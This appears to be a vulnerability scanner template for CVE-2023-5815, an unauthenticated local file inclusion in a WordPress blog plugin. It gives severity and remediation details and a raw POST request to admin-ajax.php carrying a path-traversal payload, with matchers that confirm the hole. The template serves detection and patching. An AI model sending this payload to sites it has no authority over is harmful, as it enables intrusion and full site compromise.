id: CVE-2023-5815 info: name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion author: daffainfo severity: high description: | The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data. impact: | Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise. remediation: | Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality. reference: - https://wordpress.org/plugins/blog-designer-pack/ - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-5815 epss-score: 0.49165 epss-percentile: 0.97833 cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: infornweb product: news_\&_blog_designer_pack framework: wordpress publicwww-query: "/wp-content/plugins/blog-designer-pack/" tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi,vkev http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login matchers-condition: and matchers: - type: word part: body words: - '"success"' - '"data"' - 'wp-login' condition: and - type: word part: content_type words: - application/json - type: status status: - 200 # digest: 4a0a0047304502203a63a9f481d2d19234f89d03292a66fb128dfd5940029bcc5cc29191188a11c9022100e1e9da5d5c2e58a86fa6b62dcba18568bc2b432cf068bee9a26a472affcb832d:922c64590222798bb761d5b6d8e72950